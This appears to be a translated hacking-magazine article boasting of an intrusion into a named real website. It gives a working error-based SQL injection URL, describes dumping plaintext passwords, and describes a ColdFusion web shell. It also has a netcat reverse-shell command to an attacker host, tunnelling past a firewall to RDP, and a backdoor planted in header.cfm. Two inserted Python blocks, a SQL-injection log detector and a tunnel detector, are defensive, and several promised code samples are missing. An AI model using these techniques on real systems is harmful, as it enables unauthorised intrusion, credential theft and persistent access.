Any break-in pursues its own aim, and that aim determines its value. It is up to you whether to deface a site for the sake of lovers of
risqué trifles or to squeeze out yet another root shell. The reality is that any vulnerability in a web application poses a threat to the server. And if
you are not content with the trite and somewhat boring SQL injections, this article is for you. The victim's address goes in, admin access
via RDP comes out: the classics of penetration!
Having glanced at the icon of my favourite scanner I grinned, but decided not to bother the admins and instead to turn to the Great
Index and settle everything quietly and peacefully. So, in goes the magic phrase site:ism.ws, then the Search button and... may we say
the job is done?
About 10,000 results from Google promised a laborious task. Firefox quickly acquired tabs, into which flew all sorts of quotation
marks, equals signs, hyphens and other evil spirits.
http://www.ism.ws/Applications/Forms/FormDisplay.cfm?FormID=8464
Everything turned out to be so trivial that there was no doubt about the success of what followed. The familiar blue-grey
ColdFusion error page appeared in front of me, showing the full SQL query, the DBMS type (SQL Server) and the script's local path.
Generally speaking, the verbosity of the errors ColdFusion delivers is just amazing: even the full call stack is given, more than
one could ever want.
http://www.ism.ws/Applications/Forms/FormDisplay.cfm?FormID=8464+or+1=(select+@@version%2bchar(58)%2bdb_name()%2bchar(58)%2bsystem_user%2bchar(58)%2b@@servername)--
Thus we have a not too fresh server and the RDCMS-ISM-Core database. Having looked at them closely I almost jumped for joy: the
CMS abbreviation made it clear that this site had not been knocked together on someone's lap; some big and respectable
company had written this wonder and made lots of money on it. But we'll talk about that a bit later. The DB structure is next in turn.
At this stage I don't like Microsoft's brainchild much. Not only did the developers not find the time to implement normal result paging,
they also did not manage to implement row_number on the Windows 2000 server. So a cool erotic adventure with the TOP construction is
waiting for us. TOP is a trick that returns the first several rows of a query. But it cannot be told which row to start from,
and that is very inconvenient given the circumstances of our unreal hacking. Of course one may follow the standard
way: fetch rows one by one, remember them and exclude them in subsequent queries. But I don't get off on this method, because it is
hard to automate and the URL is not long enough, so it will fail on large databases.
That's why we'll outwit everybody. We'll sort ascending and then descending and get acceptable paging. We'll spare the server and add
conditions on the field name, letting through only fields whose name contains something like "password". And to make the process ultimately cool, let's first of all determine
how many there are (query samples are given below). So, there are 9 of them. Let's go!
The ES_LoginInfo table (RDCMS-ISM-Core : dbo : ES_LoginInfo : Password) at once caught my eye. Well, one may rub one's hands and
order a pizza. But nothing of the sort. Having determined the table structure I got the following picture: three interesting fields were
present in the table, EntityID, Username and Password. I think there is no need to explain that I quickly ran a new series of queries and saw
the users' data. The passwords were there in the clear, and I could rush at breakneck speed to the site for the coveted admin panel. By the way,
when I reached the sources I could hardly understand why the passwords had not been hashed when the CMS developers had
provided for it (SHA-1, SHA-512, MD5) and had even implemented their own algorithm (iMIS). But okay, I logged in, examined the site
and returned to the dump of the database structure, because 8 more tables had fields with passwords.
Every hacker dreams of getting all the data from a database with one query. However, life sets its own conditions, and as a
rule a hacker has to get the information row by row. The trouble is that each DBMS vendor decided to complicate
the situation in its own way. So, let's talk about data paging schemes.
1. MySQL. It offers the construction limit [offset, ]rowcount: return rowcount rows (in our case 1)
starting from the offset row. Well done!
2. Oracle. Use the pseudo-column rownum. The problem is that rownum is generated on the fly, so it is
impossible, for example, to set a condition like rownum=n: such a query returns an empty result. One
cannot do without subqueries here:
3. SQL Server 2005. Here we take the standard route: use row_number(). For example:
4. SQL Server 2000. The situation is tough here: we've got only TOP. Let's apply the following trick: if we need the
row whose number is offset, first select TOP <offset> rows with an ascending sort, and
then select the first row with a descending sort from the returned result. The last row thereby becomes the
first one and the job is done. But remember that in order to get a correct result you should sort on
all the fields in the query.
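Both the error-based probe shown above (@@version, db_name(), char(58) glued into a numeric parameter, terminated by --) and the nested-TOP paging trick leave distinctive traces in the web server's access log, and the verbose ColdFusion error page is itself a 500 worth alerting on. The following Python is an added example, not code from the original article: it URL-decodes each request and flags those traces. The log lines, IP addresses, table and column names and rule names are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access-log lines (not from the original article). Line 3 has the
# shape of the error-based probe shown on the page; line 4 the nested-TOP paging shape.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jun/2010:10:00:01 +0000] "GET /Applications/Forms/FormDisplay.cfm?FormID=8464 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [12/Jun/2010:10:00:02 +0000] "GET /Applications/Forms/FormDisplay.cfm?FormID=8464%27 HTTP/1.1" 500 2201',
    '10.0.0.5 - - [12/Jun/2010:10:00:03 +0000] "GET /Applications/Forms/FormDisplay.cfm?FormID=8464+or+1=(select+@@version%2bchar(58)%2bdb_name()%2bchar(58)%2bsystem_user)-- HTTP/1.1" 500 2340',
    '10.0.0.5 - - [12/Jun/2010:10:00:04 +0000] "GET /Applications/Forms/FormDisplay.cfm?FormID=8464+or+1=(select+top+1+c+from+(select+top+3+c+from+t+order+by+c)+x+order+by+c+desc)-- HTTP/1.1" 500 2350',
    '10.0.0.9 - - [12/Jun/2010:10:00:05 +0000] "GET /search.cfm?q=top+10+tips+--+part+2 HTTP/1.1" 200 900',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# Each rule is applied to the URL-decoded, lower-cased query string.
RULES = [
    ("mssql-builtin", re.compile(r"@@version|@@servername|db_name\s*\(|system_user|char\s*\(\d+\)")),
    ("tautology", re.compile(r"\b(or|and)\s+\d+\s*=\s*\(?\s*(select|\d+)")),
    ("comment-term", re.compile(r"--\s*$")),
    ("nested-top", re.compile(r"select\s+top\s+\d+.*from\s*\(\s*select\s+top\s+\d+.*order\s+by.*\)\s*\w*\s*order\s+by.*desc")),
]

def decode_query(url):
    """Return the query string after '?', URL-decoded ('+' becomes space) and lower-cased."""
    return unquote_plus(url.partition("?")[2]).lower()

def analyze_line(line):
    """Return (ip, url, names of rules that fired), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = [name for name, rx in RULES if rx.search(decode_query(m.group("url")))]
    # A 500 from a .cfm page is the verbose ColdFusion error page the article relies on.
    if m.group("status") == "500" and m.group("url").partition("?")[0].lower().endswith(".cfm"):
        hits.append("cfm-500")
    return m.group("ip"), m.group("url"), hits

def scan(lines):
    """Aggregate fired rule names per client IP; IPs with no hits are omitted."""
    report = {}
    for line in lines:
        parsed = analyze_line(line)
        if parsed and parsed[2]:
            report.setdefault(parsed[0], set()).update(parsed[2])
    return report

if __name__ == "__main__":
    for ip, rules in scan(SAMPLE_LOG).items():
        print(ip, sorted(rules))
```

The benign "top 10 tips -- part 2" search shows why the rules key on decoded SQL structure rather than on single keywords.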
Chapter 4, or ColdFusion
I suppose everybody knows what to do with FTP. The idea of getting command execution on the server and escaping the tight
embrace of the web application at once crosses one's mind. Obviously we need a web shell that will let us wander about the server and
execute commands. But the trouble is that not a trace of PHP, or even Perl, was found. That means the moment of truth has come:
we'll have to program in ColdFusion. According to the developers this environment is very flexible and easy to master, but for some
reason I don't like it at all. So we Google the topic of web shells and fail miserably: all links led to one and the same plain piece
of code that can only execute commands. Well okay, let's complement it and add this and that; we only need to use the equipment. Some
time was spent on a really cool development which resulted in two offspring. The first shows us directories and files, the second listens
to us and follows our orders.
The files quickly took their places. Soon after, I understood that I had gained the privileges of the SYSTEM account, which was really cool. I just
could not rest on my laurels.
Chapter 5, or Blackle
The web shell is certainly a great thing, but it is not as convenient as it may seem. We need to take the bull by the horns and get a normal
console. The Total at once uploaded netcat via FTP. Netcat was launched on the dedicated server in listening mode: "nc.exe -l -p
1234". The following command was executed: "cmd /c nc.exe m0r0superdedik.com 1234 -e cmd". The shot was fired
and the shell landed in the console. Having examined the file system and run about ten utilities, I decided that Windows
without windows was a disaster. In 1999 there was no Monad (the future PowerShell); I loathed installing anything, yet for some reason managing
the server was very inconvenient. Netstat showed port 3389, and my eyes shone with joy. The very important and necessary commands
flew to the shell.
Running mstsc, though, led to total failure: a message arrived saying that the host was unavailable. Nmap
disappointed me even more, because only ports 80 and 25 turned out to be open. The host was obviously protected
by a firewall and port 3389 was trivially blocked. I did not want to give up, so I quickly made a list of possible ways of getting a
graphical interface:
VNC;
PPTP;
SSH.
We had done almost everything except for one small detail: access to the desktop. All my cherished hopes started to fade,
because the shell ran with SYSTEM account privileges. We would not even have tried if we had not been hackers, but, just as
expected, all attempts failed. I even tried Metasploit with the windows/vncinject/reverse_tcp payload (a very slow thing), but the
Great Framework did not help either. How to deploy VNC on a server through a non-interactive shell with no access
to the desktop remained a mystery. In fact I was even glad: why use VNC if there is RDP? We only had to get through the
firewall.
The brilliant idea concerning PPTP is to establish a PPTP connection to our dedicated server and then address the host by its
internal address, tunnelling the traffic through the firewall. In Windows all connections are configured graphically, but
there should be a way to do it from the console. Start Russinovich's Procmon on the test machine and watch the registry at the
moment the client brings up the network connection. The result defies logic, because nothing interesting
happens in the registry. Microsoft has surpassed itself: what was the point of creating a registry if its own modules don't use it? Let them
think it over in their spare time; meanwhile we found a phone book at C:\Documents and Settings\All Users\Application Data\
Microsoft\Network\Connections\Pbk\rasphone.pbk, which actually describes the parameters of the dial-up and VPN connections.
Establish a connection to the dedicated server (with the RRAS service installed and configured) on the test machine and
copy the resulting file (rasphone.pbk) to the compromised host. Then create the following command file:
We need the second line to restore the default route after the connection, so that our dedicated server does not take over
routing of the traffic. I ran the .bat file and was just knocked out. I never got anywhere near the connection: the firewall seemed to block
outgoing connections based on the protocol type. Our GRE traffic had got onto the blacklist as well.
We had almost given way to despair, but we didn't give up. To tell the truth, we'd been that dumb for quite a long time, because we should
have turned to SSH for help right away. By the way, it's a very high-end thing and has been discussed more than once in ][. Not only
can we get a shell, we can also invent lots of other interesting things. Our last hope was to successfully take just three steps:
I can understand a lot of things, but I don't know why in the 21st century Windows does not have a built-in SSH server. Well okay, we'll
choose any one; all the more so as there are lots of them. Of course our favourite PuTTY is used as the client. But it's not just PuTTY, it's the
magic one. If you remember, when connecting to a new host PuTTY sincerely suggests storing the host key in its cache. Our access to the
command line is not interactive, so we wouldn't be able to answer this question. It means we need the host key
to be stored automatically, but PuTTY can't do that. Having googled a little we found Quest PuTTY 0.60_q1.129. It's the same thing plus
what we need!
Check the SSH server console and rejoice, because the connection is established! Now start mstsc and connect to
localhost:3390. We see the logon window of Windows 2000. Enter the account data added with the help of net user and enjoy
the GUI with administrator privileges. Hurrah, it's time to take a sip of a real rock'n'roll drink, whisky, and celebrate the
success.
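The tunnel just described, where RDP is reached over an outbound SSH connection because port 3389 is blocked inbound, shows up on the compromised host as an RDP session whose peer is 127.0.0.1 plus an outbound connection the server has no business making, both held open by the same process. The following Python is an added example, not code from the original article: it parses constructed netstat -ano output (the PID column is assumed; the article's Windows 2000 netstat cannot show it) and correlates the two into one indicator. The addresses, PIDs and the set of expected outbound ports are assumptions.

```python
import re

# Constructed "netstat -ano" output (not from the original article); PIDs and addresses are assumed.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       772
  TCP    10.1.1.20:80           203.0.113.7:51234      ESTABLISHED     1104
  TCP    10.1.1.20:1080         198.51.100.25:25       ESTABLISHED     1380
  TCP    127.0.0.1:3389         127.0.0.1:1055         ESTABLISHED     772
  TCP    127.0.0.1:1055         127.0.0.1:3389         ESTABLISHED     2212
  TCP    10.1.1.20:1062         198.51.100.9:22        ESTABLISHED     2212
  TCP    10.1.1.20:1070         198.51.100.9:1234      ESTABLISHED     2240
"""

ROW_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s+(\d+)\s*$")
# Assumption: the only destination ports this web server legitimately connects out to.
EXPECTED_OUTBOUND = {25, 53, 80, 443}

def parse_netstat(text):
    """Return one dict per TCP row; the header and any non-matching lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            rows.append({"lip": m[1], "lport": int(m[2]), "fip": m[3],
                         "fport": int(m[4]), "state": m[5], "pid": int(m[6])})
    return rows

def is_loopback(ip):
    return ip.startswith("127.")

def find_tunnel_indicators(rows):
    """Return sorted (indicator, pid) pairs; 'tunnel-to-rdp' fires when one PID both holds an
    unexpected outbound connection and is the client side of a loopback RDP session."""
    findings, outbound_pids, rdp_client_pids = set(), set(), set()
    for r in (x for x in rows if x["state"] == "ESTABLISHED"):
        if r["lport"] == 3389 and is_loopback(r["fip"]):
            findings.add(("rdp-over-loopback", r["pid"]))  # real RDP clients are never local
        if r["fport"] == 3389 and is_loopback(r["fip"]):
            rdp_client_pids.add(r["pid"])
        # Ephemeral local port and a non-loopback peer mean this host initiated the connection.
        if r["lport"] > 1023 and not is_loopback(r["fip"]) and r["fport"] not in EXPECTED_OUTBOUND:
            findings.add(("unexpected-outbound", r["pid"]))
            outbound_pids.add(r["pid"])
    for pid in outbound_pids & rdp_client_pids:
        findings.add(("tunnel-to-rdp", pid))
    return sorted(findings)
```

On the sample, PID 2212 is flagged as the tunnel endpoint, while the netcat-style connection to port 1234 from PID 2240 surfaces only as an unexpected outbound connection.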
A piece of code was hidden in the file header.cfm, which in its turn is included by almost every CMS file. Then create a simple
form pointing at any *.cfm file on the server and get a simple way of organising RDP.
WWW
To make the vulnerability search automated you may use the following products:
INFO
Retrieving information from the DB by hand is tiresome and thankless. Look closely at the automation tools (or
develop your own), for example SIPT. IMHO the program often glitches and works single-threaded, but it copes with its task
well.
Read the full version of the article in the June issue of HACKER.
WARNING
Warning: this material is provided for informational purposes only. Neither the author nor the editorial board is responsible for your
actions!